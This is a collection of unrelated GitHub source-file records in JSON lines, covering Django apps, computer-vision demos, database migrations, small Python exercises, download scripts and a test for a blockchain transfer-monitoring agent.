+{"seq_id":"74320157849","text":"from praxis import test_utils\nfrom saxml.server.pax.lm.params import lm_cloud\nfrom saxml.server.pax.lm.params import template\nimport tensorflow as tf\n\n\n@template.make_servable()\nclass TestModel(lm_cloud.LmCloudSpmd2BTest):\n  ENABLE_GENERATE_STREAM = True\n  MAX_SEQ_LEN = None\n\n\n@template.make_servable()\nclass TestModelMaxSequenceLength(TestModel):\n  MAX_SEQ_LEN = 128\n\n\n@template.make_servable()\nclass TestLayerwiseModel(TestModel):\n\n  def task(self):\n    task_p = super().task()\n    transformer_p = (\n        task_p.model.lm_tpl.stacked_transformer_tpl.transformer_layer_params_tpl\n    )\n    transformer_p_list = []\n\n    for _ in range(self.NUM_LAYERS):\n      single_tr_p = transformer_p.clone()\n      transformer_p_list.append(single_tr_p)\n\n    task_p.model.lm_tpl.stacked_transformer_tpl.transformer_layer_params_tpl = (\n        transformer_p_list\n    )\n    return task_p\n\n\nclass TemplateTest(tf.test.TestCase, test_utils.TestCase):\n\n  def test_seqlen(self):\n    config = TestModelMaxSequenceLength()\n    self.assertEqual(\n        config.generate().decoder.seqlen, TestModelMaxSequenceLength.MAX_SEQ_LEN\n    )\n    self.assertEqual(\n        config.generate_stream().decoder.seqlen,\n        TestModelMaxSequenceLength.MAX_SEQ_LEN,\n    )\n\n    config = TestModel()\n    self.assertEqual(\n        config.generate().decoder.seqlen,\n        TestModel.INPUT_SEQ_LEN + TestModel.MAX_DECODE_STEPS,\n    )\n    self.assertEqual(\n        config.generate_stream().decoder.seqlen,\n        TestModel.INPUT_SEQ_LEN + TestModel.MAX_DECODE_STEPS,\n    )\n\n    config = TestLayerwiseModel()\n    self.assertEqual(\n        config.generate().decoder.seqlen,\n        TestLayerwiseModel.INPUT_SEQ_LEN + TestLayerwiseModel.MAX_DECODE_STEPS,\n    )\n    self.assertEqual(\n        config.generate_stream().decoder.seqlen,\n        TestLayerwiseModel.INPUT_SEQ_LEN + TestLayerwiseModel.MAX_DECODE_STEPS,\n    )\n\n\nif __name__ == '__main__':\n  tf.test.main()\n","repo_name":"google/saxml","sub_path":"saxml/server/pax/lm/params/template_test.py","file_name":"template_test.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"31"}
+{"seq_id":"4101174763","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread(\"./img_data/mountain/match2.jpg\")\nimage_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# SIFT (Scale-Invariant Feature Transform)\n# An algorithm that detects objects irrespective of the scale and rotation of the image and reference\n# Returns key points in the image to mark\n# Syntax: sift = cv2.xfeatures2d.SIFT_create()\n#         key_point, descriptor = sift.detectAndCompute(gray_image, optionValue=None)\n\n# Applying the function\nsift = cv2.xfeatures2d.SIFT_create()\nkp, des = sift.detectAndCompute(image_gray, None)\n \n\n# Applying the function\nkp_image = cv2.drawKeypoints(image, kp, None, color=(\n    0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow('SIFT', kp_image)\ncv2.waitKey()\n\n# SURF (Speeded-Up Robust Features)\n# SURF is faster than SIFT\n# SURF goes a little further than SIFT and approximates LoG with a Box Filter\n# One big advantage of this approximation is that convolution with a box filter can be easily calculated with the help of integral images. \n# And it can be done in parallel for different scales. \n# SURF also relies on the determinant of the Hessian matrix for both scale and location\n# It is 3 times faster than SIFT while performance is comparable to SIFT. \n# SURF is good at handling images with blurring and rotation, but not good at handling viewpoint change and illumination change\n# Syntax:\n# surf = cv2.xfeatures2d.SURF_create()\n# kp, des = surf.detectAndCompute(image_gray, None)\n\n### Patented, can't be used ###\n\n# surf = cv2.xfeatures2d.SURF_create()\n# kp, des = surf.detectAndCompute(image_gray, None)\n\n# kp_image = cv2.drawKeypoints(image, kp, None, color=(\n#     0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n# cv2.imshow('SURF', kp_image)\n# cv2.waitKey()\n","repo_name":"anhphan2705/Image-Feature-Matching","sub_path":"sift_surf_algo.py","file_name":"sift_surf_algo.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"12086964311","text":"import numpy as np\nfrom . import predefined_maps as pmaps\nfrom . import utils\nimport matplotlib.pyplot as plt\n\nclass L2ExplorerMap(object):\n    def __init__(self, map_id, cell_size=2):\n        self.map_id = map_id\n        (polygon_specs, xlim, ylim) = pmaps.get_map(map_id)\n        self.xlim = tuple(xlim)\n        self.ylim = tuple(ylim)\n        self.occgrid = utils.OccupancyGrid(xlim=xlim, ylim=ylim, resolution=cell_size)\n        self.polygons = []\n        for poly_vertices in polygon_specs:\n            poly = utils.MyPolygon(vertices=poly_vertices)\n            self.occgrid.set_occupied_poly(poly)\n            self.polygons.append(poly)\n        self.obj_locs = {None: np.array([[0,0]])}\n\n\n    def summary(self):\n        print(\"L2ExplorerMap:\")\n        print(\"  id = \", self.map_id)\n        print(\"  xlimits = {0}, ylimits ={1}\".format(self.xlim, self.ylim))\n        print(\"  polygons = \", len(self.polygons))\n        print(\"  objects:\")\n        for (obj_type, locs) in self.obj_locs.items():\n            print(\"    {0} x {1}\".format(obj_type, len(locs)))\n\n\n    def plot(self, to_show=('map',)):\n        if 'grid' in to_show:\n            fig1 = plt.figure()\n            self.occgrid.show(plt.axes(label=\"occgrid\"))\n        if 'map' in to_show:\n            fig2 = plt.figure()\n            ax2 = plt.axes()\n            ax2.set_xlim(*self.xlim)\n            ax2.set_ylim(*self.ylim)\n            for poly in self.polygons:\n                poly.plot(ax=ax2)\n            plots = {}\n            for (obj_type, locs) in self.obj_locs.items():\n                if obj_type is not None:\n                    plots[obj_type] = ax2.scatter(locs[:,0], locs[:,1])\n            ax2.legend(list(plots.values()), list(plots.keys()), loc='upper right')\n        plt.show()\n\n\n    def add_objects(self, obj_class:str, locations:np.ndarray):\n        if obj_class in self.obj_locs:\n            self.obj_locs[obj_class] = np.append(self.obj_locs[obj_class], locations, axis=0)\n        else:\n            self.obj_locs[obj_class] = locations\n        print(\"Adding {0} points for '{1}'\".format(len(locations), obj_class))\n\n    def get_objects_by_class(self, obj_class:str):\n        return self.obj_locs.get(obj_class, None)\n\n    def get_object_classes(self):\n        lst = list(self.obj_locs.keys()) \n        lst.remove(None)  # remove the 'None' key\n        return lst\n\n","repo_name":"lifelong-learning-systems/l2explorer","sub_path":"l2explorer/l2procgen/l2explorer_map.py","file_name":"l2explorer_map.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"34661293585","text":"'''\nA015 Number of Verifications\nProblem : https://www.acmicpc.net/problem/2475\nDate : 20220905\n'''\n\nnumber = input().split(' ')\nsum = 0\nfor i 
in number:\n sum = sum + int(i) * int(i)\nspec = sum % 10\nprint(spec)\n","repo_name":"tpwpfrnl/ProblemSolving","sub_path":"a015.py","file_name":"a015.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6073756972","text":"#! /usr/bin/python\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\ntry:\n from crypto.Random import random\nexcept:\n from Crypto.Random import random\nimport pickle\nimport sys\nfrom math import log, ceil\nimport pkg_resources\n\ndef leepalabras():\n f = open('palabras.txt')\n dic = {}\n for l in f:\n if ':' in l:\n palabra = l[:-2]\n dic[palabra]=[]\n else:\n dic[palabra].append(l[:-1])\n return dic\n\n\nclass Programa(QtWidgets.QDialog):\n def __init__(self, parent = None):\n QtWidgets.QDialog.__init__(self)\n self.ui = uic.loadUi(\"generapass.ui\")\n self.ui.show()\n\n def genera(self, *args):\n bits = int(self.ui.spinBox.value())\n keyword = str(self.ui.lineEdit.text())\n bitsusados = 0\n length = int(self.ui.spinBox_2.value())\n self.ui.textBrowser.clear()\n if keyword:\n bits_disponibles = [log(len(dic[a]),2) for a in keyword]\n totalbits = sum(bits_disponibles)\n for letra in keyword.lower():\n b = bits_disponibles.pop(0)\n aelegir = int(ceil(2**(bits*b/totalbits)))\n palabras = dic[letra][:aelegir]\n n = random.choice(palabras)\n self.ui.textBrowser.insertPlainText(n+'\\n')\n bitsusados += log(len(palabras),2)\n else:\n aelegir = int(ceil(2**(float(bits)/length)))\n palabras = dic['all'][:aelegir]\n for i in range(length):\n n = random.choice(palabras)\n self.ui.textBrowser.insertPlainText(n+'\\n')\n bitsusados += log(len(palabras),2)\n self.ui.statusbar.showMessage('bits de entropia: ' + str(bitsusados))\n\n\n\nif __name__ == \"__main__\":\n dic = leepalabras()\n app = QtWidgets.QApplication(sys.argv)\n window = Programa()\n window.ui.pushButton.clicked.connect(window.genera)\n sys.exit(app.exec_())\n","repo_name":"miguelmarco/pydiceware-es","sub_path":"gui/generapass.py","file_name":"generapass.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74906690007","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[17]:\n\n\ndef plane_point(plane,point):\n #draw plane\n #draw two point\n #print distance\n plane_normal=[plane[0],plane[1],plane[2]]\n d=my_product(plane_normal,point)/my_length_function(plane_normal)\n\n t= plane[3]-(my_product(plane_normal,point))\n t=t/my_product(plane_normal,plane_normal)\n p_0=[0,0,0]\n p_0[0]=point[0]+t*plane[0]\n p_0[1]=point[1]+t*plane[1]\n p_0[2]=point[2]+t*plane[2]\n \n return d,t,p_0\n #p_o=\n #plane,point,p_0\n\n\n# In[18]:\n\n\nplane_1=[1,2,3,-6]\npoint_1=[4,2,10]\nplane_point(plane_1,point_1)\n\n\n# In[6]:\n\n\ndef my_product(a,b):\n return a[0]*b[0]+a[1]*b[1]+a[2]*b[2]\n\ndef my_length_function(a):\n return my_product(a,a)**0.5\n\n\n# In[7]:\n\n\na=[1,2,3]\nb=[4,5,6]\nmy_product(a,b),my_length_function(a),my_length_function(b)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"gamzegulyol/computational_geometry","sub_path":"lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10914925754","text":"\"\"\"empty message\n\nRevision ID: bf80b8120448\nRevises: \nCreate Date: 2020-07-04 21:27:41.059812\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by 
Alembic.\nrevision = 'bf80b8120448'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('customer',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(), nullable=True),\n    sa.Column('city', sa.String(), nullable=True),\n    sa.Column('email', sa.String(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_table('merchant',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(), nullable=True),\n    sa.Column('city', sa.String(), nullable=True),\n    sa.Column('email', sa.String(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_table('order',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('customer_id', sa.Integer(), nullable=False),\n    sa.Column('merchant_id', sa.Integer(), nullable=False),\n    sa.ForeignKeyConstraint(['customer_id'], ['customer.id'], ),\n    sa.ForeignKeyConstraint(['merchant_id'], ['merchant.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('order')\n    op.drop_table('merchant')\n    op.drop_table('customer')\n    # ### end Alembic commands ###\n","repo_name":"gururajks/pickup_backend","sub_path":"migrations/versions/bf80b8120448_.py","file_name":"bf80b8120448_.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73789378648","text":"with CQCConnection(\"Alice\") as Alice:\n    # one qubit per classical bit; bits and bases are the data/basis lists, N their length\n    qubits = [None] * N\n    for i in range(N):\n        qubits[i] = qubit(Alice)\n\n        # Encode value\n        if bits[i] == 1:\n            qubits[i].Z()\n\n        # Change basis\n        if bases[i] == 1:\n            qubits[i].H()\n","repo_name":"aThorp96/undergraduate_thesis","sub_path":"code/encoding_example.py","file_name":"encoding_example.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14909131906","text":"from django.shortcuts import render, redirect\nfrom .models import Task\nfrom .forms import TaskForm\n\n\ndef index(request):\n    template = 'todo/index.html'\n    tasks = Task.objects.all()\n    form = TaskForm()\n\n    if request.method == 'POST':\n\n        form = TaskForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect('/')\n\n    context = {\n        'tasks': tasks,\n        'task_form': form,\n    }\n    return render(request, template_name=template, context=context)\n\n\ndef update(request, pk):\n    template = 'todo/update.html'\n    task = Task.objects.get(id=pk)\n    form = TaskForm(instance=task)\n\n    if request.method == 'POST':\n        form = TaskForm(request.POST, instance=task)\n        if form.is_valid():\n            form.save()\n            return redirect('/')\n    context = {\n        'task': task,\n        'task_form': form,\n    }\n    return render(request, template_name=template, context=context)\n\n\ndef delete(request, pk):\n    template = 'todo/delete.html'\n\n    task = Task.objects.get(id=pk)\n    if request.method == 'POST':\n        if 'delete_task' in request.POST:\n            task.delete()\n            return redirect('/')\n\n        if 'cancel_task' in request.POST:\n            return redirect('/')\n    context = {\n        'task': task,\n    }\n\n    return render(request, template_name=template, context=context)\n","repo_name":"omolojakazeem/todoappV1","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
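The function-based views above assume a Task model and a ModelForm named TaskForm. A minimal sketch of what those could look like, split across the app's models.py and forms.py (field names are guesses based on how the views use them, not the repo's actual definitions):

# models.py
from django.db import models

class Task(models.Model):
    title = models.CharField(max_length=200)        # illustrative field
    complete = models.BooleanField(default=False)   # illustrative field

    def __str__(self):
        return self.title

# forms.py
from django import forms
from .models import Task

class TaskForm(forms.ModelForm):
    class Meta:
        model = Task
        fields = '__all__'  # expose every model field on the form

Binding the form to request.POST and calling is_valid()/save(), as the views do, is the standard ModelForm create/update cycle; passing instance=task switches the same form from creating to editing.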
+{"seq_id":"40946244642","text":"while True:\n try:\n print('0이 아닌 정수를 입력해주세요 ', end='')\n n = int(input())\n result = 1/n\n # print(1 / n)\n # break\n except ZeroDivisionError:\n print('0 으로는 나눌 수 없습니다!! 다시 입력해 주세요!!!')\n except ValueError:\n print('정수 입력하라니깐 왜 문자 입력하냐???')\n else:\n print(result)\n break\n","repo_name":"SooDevv/Algorithm_Training","sub_path":"Review/test/try01.py","file_name":"try01.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74426620568","text":"from django.core.exceptions import ValidationError\nimport validators\nfrom pessoal_quadro.models import Agente, Pessoa, Nomiacao_Cargo, Baixa, Reforma\nfrom formacao.models import Selecionado_formacao, Formacao_conclusao\nfrom transferencia.models import Transferencia, Troca\nfrom django.contrib import messages\nimport sweetify\nimport re\nfrom django.contrib.auth.decorators import login_required\nimport header\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\n\n\ndef verficarAcessoAdmin(request):\n if request.user.email != '5':\n return True\n\n\ndef verficarAcessoAdminGestor(request):\n if request.user.email != '5' and request.user.email != '4':\n return True\n\n\ndef verficarAcessoPessoalQuadro(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '1':\n return True\n\n\ndef verficarAcessoFormacao(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '2':\n return True\n\n\ndef verficarAcessoTransferencia(request):\n if request.user.email != '5' and request.user.email != '4' and request.user.email != '3':\n return True\n\n\ndef validar_baixa(request):\n try:\n bix = header.views_core.retorna_numero_agente(request.POST['bi'])\n bx = Baixa.objects.get(agente_id=bix)\n if bx.motivo_baixa == 'Reforma' or bx.motivo_baixa == 'Falecimento':\n #messages.warning(request,\" Não pode! ja existe uma baixa com as mesma carateristica..\")\n foto = str(bx.agente.foto_fardado)\n sweetify.error(request, 'Não pode! ja existe uma baixa com as mesma carateristica!...',\n imageUrl='../static/asset/img/user.jpg', persistent='Ok', timer='4000')\n return False\n else:\n return True\n except Exception as e:\n return True\n\n\ndef validar_reforma_anticipada(request):\n try:\n bix = header.views_core.retorna_numero_agente(request.POST['bi'])\n ref = Reforma.objects.get(agente_id=bix)\n if ref.reforma == 'Anticipada':\n messages.warning(request, \" Não pode! 
ja existe na reforma..\")\n return False\n else:\n return True\n except Exception as e:\n try:\n bai = Baixa.objects.get(agente_id=bix)\n if bai.motivo_baixa == 'Falecimento':\n messages.warning(\n request, \" O agente é falecido, não pode ser adicionado..\")\n return False\n elif bix > 0:\n return True\n else:\n return False\n except Exception as e:\n if bix > 0:\n return True\n else:\n messages.warning(request, \" O Nip ou o Nº BI não é valido..\")\n return False\n\n\ndef validar_pedido_transferencia(request):\n try:\n bi = request.POST['bi']\n bix = header.views_core.retorna_numero_agente(bi)\n bis = Transferencia.objects.get(agente_id=bix)\n if bis.id is not None:\n messages.warning(\n \"Ja existe uma transferencia a espera com esses dados....\")\n return False\n except Transferencia.DoesNotExist:\n return True\n\n\ndef validar_selecionar_formacao(request):\n bi = request.POST['bi']\n id = header.views_core.retorna_numero_agente(bi)\n try:\n seleciona = Selecionado_formacao.objects.get(agente_id=id)\n if seleciona.id is not None:\n #messages.warning(request, 'O agente ja existe na lista selecionado para uma formação, Para continuar deve remover da lista ...')\n sweetify.error(\n request, 'O agente ja existe na lista, selecionado para uma formação, para continua deve ser removido da lista....', persistent='Ok', timer='6000')\n return False\n except Selecionado_formacao.DoesNotExist:\n return True\n\n\ndef verficar_falecimento(request, value=None):\n try:\n baixa = Baixa.objects.get(agente_id=value)\n if baixa.motivo_baixa == 'Falecimento':\n messages.warning(\n request, 'Não pode adicionar o agente; O agente ja é falecido')\n return False\n else:\n return True\n except Baixa.DoesNotExist:\n return True\n\n\ndef validar_conclusao_formacao(request):\n bi = request.POST['bi']\n #pessoa = Pessoa.objects.get(bi=bi.upper())\n agente = header.views_core.retorna_numero_agente(bi)\n try:\n seleciona = Selecionado_formacao.objects.get(agente_id=agente)\n if seleciona.id is not None:\n return True\n except Selecionado_formacao.DoesNotExist:\n messages.warning(\n request, 'O agente não existe na lista dos selecionados, não pode ser adicionado a conclusão da formação ...')\n return False\n\n\ndef validar_data_nascimento_igresso_colocacao(request):\n nascimento = request.POST['data_nascimento']\n igresso = request.POST['data_igresso']\n colocacao = request.POST['data_colocacao']\n nascimento = nascimento.split(\"-\")\n igresso = igresso.split(\"-\")\n colocacao = colocacao.split(\"-\")\n igress = int(igresso[0]) - int(nascimento[0])\n if nascimento[0] > igresso[0] or nascimento[0] > colocacao[0]:\n messages.warning(\n request, ' O ano de nascimento não poder ser maior que ano de igresso, nem ano de Colocação....')\n return False\n elif igresso[0] > colocacao[0] or igress < 18:\n messages.warning(\n request, ' a data de igresso não é valida pelo ano de Colocação....')\n return False\n elif igress < 18:\n messages.warning(\n request, ' A data de igresso diz que vc é menor de idade, na data de nascimento....')\n return False\n else:\n return True\n\n\ndef verficar_bi_numero_agente(request):\n try:\n bi = request.POST['bi_id']\n numero_agente = request.POST['numero_agente_id']\n pessoa = Pessoa.objects.get(bi=bi)\n if pessoa.bi is not None:\n agente = Agente.objects.get(numero_agente=numero_agente)\n if agente.pessoa_id == pessoa.id:\n return True\n else:\n messages.warning(\n request, ' O Bi e o numero de agente não pertence a mesma pessoa...')\n return False\n except Pessoa.DoesNotExist:\n 
messages.warning(\n request, ' Não existe agente com esse numero de bi e numero de agente...')\n return False\n\n\n# FUNÇÃO QUE VALIDA SE O BI EXISTE E RETORNA ERRO SE EXISTIR CASO CONTRAIO TRUE\ndef consultar_bi(value):\n try:\n bi = Pessoa.objects.get(bi=value.upper())\n if bi.bi is not None:\n raise ValidationError(\n \"Ja existe agente com esse numero de bi no sistema \")\n # return False\n except Pessoa.DoesNotExist:\n return True\n\n\n# FUNÇÃO QUE VALIDA SE O BI OU NIP SE EXISTE E RETORNA TRUE SE EXISTE , CASO CONTRARIO ERRO\ndef consultar_bi_existe(value):\n try:\n bis = Pessoa.objects.get(bi=value.upper())\n if bis.bi is not None:\n return True\n except Pessoa.DoesNotExist:\n try:\n agente = Agente.objects.get(nip=value)\n if agente.nip is not None:\n return True\n except Agente.DoesNotExist:\n try:\n b = Pessoa.objects.filter(bi=value.upper())\n if b is not None:\n return True\n except Pessoa.DoesNotExist:\n try:\n agente = Agente.objects.filter(nip=value)\n if len(agente) > 0:\n return True\n except Agente.DoesNotExist:\n raise ValidationError(\n \"Numero do Nip ou Bi, Não existe....\")\n\n\ndef consultar_bi_True_False(value):\n try:\n bis = Pessoa.objects.get(bi=value.upper())\n if bis.bi is not None:\n return (True, bis.data_nascimento)\n except Pessoa.DoesNotExist:\n return (False, None)\n\n\n# @login_required\ndef consultar_numero_agente(value):\n try:\n ng = Agente.objects.get(numero_agente=value)\n except Agente.DoesNotExist:\n raise ValidationError(\n \" Não existe agente com esse numero no sistema.!\")\n\n\n# @login_required\ndef validar_comprimento_4(value):\n if value is None or len(value) < 4:\n raise ValidationError(\n ('Não é valido, informa um nome valido'),\n code='invalid',\n )\n\n\n# @login_required\ndef validar_email(value):\n if not validators.email(value):\n raise ValidationError(\n ('Não é valido, informa um email valido'),\n code='invalid',\n )\n\n\n# função que esta validar o BI e o nip do agente\ndef validar_bi(value):\n try:\n numero = 0\n letra = 0\n xl = 0\n prog = re.compile(\".\")\n bi = re.findall(prog, value)\n if len(value) == 14:\n while xl < len(bi):\n if bi[xl].isdigit():\n numero = numero + 1\n else:\n letra = letra + 1\n xl = xl + 1\n nove = bi[9]\n deze = bi[10]\n if len(bi) != 14 or letra != 2 or numero != 12:\n raise ValidationError(\n ('O numero do Bi não é valido, são 14 digtos incluindo 2 letra '),\n )\n elif not nove.isalpha() or not deze.isalpha():\n raise ValidationError(\n ('O numero do Bi não é valido, são 14 digtos incluindo 2 letra '),\n )\n else:\n while xl < len(bi):\n if bi[xl].isdigit():\n numero += numero\n else:\n if len(value) > 2 and len(value) < 9:\n x = 0\n else:\n raise ValidationError(\n ('O numero de indentificação não é valido..'),\n )\n break\n xl = xl + 1\n except IndexError:\n raise ValidationError(\n ('O numero do Bi não é valido.! 
erro'),\n        )\n\n\ndef validar_comprimento_3(value):\n    if len(value) < 3:\n        raise ValidationError(\n            'Não é valido, o tamanho é muito curto'\n        )\n\n\ndef validar_numeros(value):\n    if not value.isnumeric():\n        raise ValidationError(\n            'Não é valido, digita numeros validos'\n        )\n\n\ndef validar_string(value):\n    if value.isdigit():\n        raise ValidationError(\n            'Não é valido, digita apenas letras'\n        )\n\n\n# VALIDAR CAIXA SOCIAL\ndef validar_numero_caixa_social(value):\n    try:\n        valor = Agente.objects.get(numero_caixa_social=value)\n        if valor.numero_caixa_social is not None:\n            raise ValidationError(\" o numero da caixa social ja existe\")\n    except Agente.DoesNotExist:\n        return True\n\n\n# VALIDAR O REGISTO DE NOMIAÇÃO\ndef verficar_id_nomiacao(request):\n    try:\n        bi = request.POST['bi']\n        pessoa = Pessoa.objects.get(bi=bi)\n        if pessoa.id is not None:\n            nomi = Nomiacao_Cargo.objects.get(agente_id=pessoa.id)\n            if nomi.id is not None:\n                #messages.warning(request, 'Ja existe uma nomiação no sistema deste agente!.. Apenas actualiza ou elimina o registo...')\n                return (False, nomi)\n            else:\n                return (True, None)\n    except Exception as e:\n        try:\n            agente = Agente.objects.get(nip=bi)\n            if agente.agente_id is not None:\n                nomi = Nomiacao_Cargo.objects.get(agente_id=agente.id)\n                if nomi.id is not None:\n                    return (False, nomi)\n                else:\n                    return (True, None)\n        except Exception as e:\n            return (True, None)\n","repo_name":"ismaely/sigrh_cpl","sub_path":"header/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":11998,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
+{"seq_id":"28971714936","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Clone all gists of the GitHub username given on the command line.\"\"\"\n\nimport subprocess\nimport sys\nimport requests\n\nif len(sys.argv) > 1:\n    gh_user = sys.argv[1]\nelse:\n    print(\"Usage: clone-gists.py USERNAME\")\n    sys.exit(1)\n\nreq = requests.get('https://api.github.com/users/%s/gists' % gh_user)\n\nfor gist in req.json():\n    ret = subprocess.call(['git', 'clone', gist['git_pull_url']])\n    if ret != 0:\n        print(\"ERROR cloning gist %s. Please check output.\" % gist['id'])\n","repo_name":"NateWeiler/Resources","sub_path":"Python/Skeleton/venv/clone-all-gists.py","file_name":"clone-all-gists.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
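The clone script above reads only the first page of the GitHub gists listing (30 entries by default). A minimal pagination sketch, using only the documented page/per_page query parameters of the public API; the iter_gists helper name is illustrative, not part of the original script:

import requests

def iter_gists(gh_user):
    # Yield every public gist of gh_user, walking the paginated listing.
    page = 1
    while True:
        resp = requests.get(
            'https://api.github.com/users/%s/gists' % gh_user,
            params={'page': page, 'per_page': 100},  # 100 is the API maximum
        )
        resp.raise_for_status()
        batch = resp.json()
        if not batch:  # an empty page means the listing is exhausted
            return
        for gist in batch:
            yield gist
        page += 1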
try again\")\n paramater = input(\"choose first parameter: \")\n \n URL_new = URL + \"/\" + paramater\n print(URL_new)\n URL = URL_new\n\n # select .osm file\n page = requests.get(URL)\n regex = \"\"\"href=\"(\\d{3}.osc.gz)\"\"\"\n match = re.findall(regex, page.text)\n print(match)\n\n print(\"Choose between: \", match)\n paramater = input(\"choose first parameter: \")\n\n while not paramater in match:\n print(len(match))\n print(\"parameter nog in list... try again\")\n paramater = input(\"choose first parameter: \")\n\n full_url = URL + \"/\" + paramater\n print(full_url)\n file_name = paramater\n return full_url, file_name\n\n\ndef download_area_osm_file():\n url, file_name = Choose_area()\n print(url, file_name)\n call([\"wget\", url]) # download latest .osm file\n call([\"gunzip\", file_name]) # extract latest .osm file\n \n\ndownload_area_osm_file()\n\n\n\n\n","repo_name":"BenoitLan/copy_linked_data","sub_path":"Choose_area.py","file_name":"Choose_area.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36726239805","text":"import timeit\nimport agent\nfrom web3 import Web3\nfrom web3_mock import Web3Mock, ADDRESS_WITH_LARGE_BALANCE, ADDRESS_WITHOUT_LARGE_BALANCE, CURRENT_BLOCK, OLDER_CURRENT_BLOCK\nfrom forta_agent import create_transaction_event, FindingSeverity, get_json_rpc_url, EntityType\nfrom src.constants import SWAP_TOPICS\n\nw3 = Web3Mock()\nreal_w3 = Web3(Web3.HTTPProvider(get_json_rpc_url()))\n\n\nclass TestLargeTransferOut:\n\n def test_large_transfer_no_alert(self):\n agent.initialize()\n\n tx_event = create_transaction_event({\n 'transaction': {\n 'hash': \"0\",\n 'to': \"0x1c5dCdd006EA78a7E4783f9e6021C32935a10fb4\",\n 'from': ADDRESS_WITH_LARGE_BALANCE,\n 'value': \"50000000000000000000\"\n },\n 'block': {\n 'number': CURRENT_BLOCK\n },\n 'receipt': {\n 'logs': []}\n })\n\n findings = agent.detect_suspicious_native_transfers(w3, tx_event)\n assert len(\n findings) == 0, \"this should have not triggered a finding as the account had assets 1 day ago\"\n\n def test_preformance(self):\n agent.initialize()\n\n global real_w3\n tx = real_w3.eth.get_transaction(\n '0x39ed9312dabfe228ab03659192540da18b97f89eb7b89abaa9a6da03011e9668')\n\n global large_transfer_tx_event\n large_transfer_tx_event = create_transaction_event({\n 'transaction': {\n 'hash': tx.hash,\n 'to': tx.to,\n 'from': tx['from'],\n 'value': tx.value\n },\n 'block': {\n 'number': tx.blockNumber\n },\n 'receipt': {\n 'logs': []}\n })\n\n tx = real_w3.eth.get_transaction(\n '0xc8a4877b4b3ed9e1cbd22bcbd8d6f6e78b8d70e96475dfa4a4b9751bf0c08a29')\n global small_transfer_tx_event\n small_transfer_tx_event = create_transaction_event({\n 'transaction': {\n 'hash': tx.hash,\n 'to': tx.to,\n 'from': tx['from'],\n 'value': tx.value\n },\n 'block': {\n 'number': tx.blockNumber\n },\n 'receipt': {\n 'logs': []}\n })\n\n # Chain: Blocktime, Number of Tx -> Avg processing time in ms target\n # Ethereum: 12s, 150 -> 80ms\n # BSC: 3s, 70 -> 43ms\n # Polygon: 2s, 50 -> 40ms\n # Avalanche: 2s, 5 -> 400ms\n # Arbitrum: 1s, 5 -> 200ms\n # Optimism: 24s, 150 -> 160ms\n # Fantom: 1s, 5 -> 200ms\n\n # we're assuming 10% of tx will contain a large transfer\n # so our target for polygon is 5 tx with a large transfer and 45 without large transfers\n\n processing_runs = 10\n processing_time_large_transfers_avg_ms = timeit.timeit(\n 'agent.detect_suspicious_native_transfers(real_w3, large_transfer_tx_event)', number=processing_runs, 
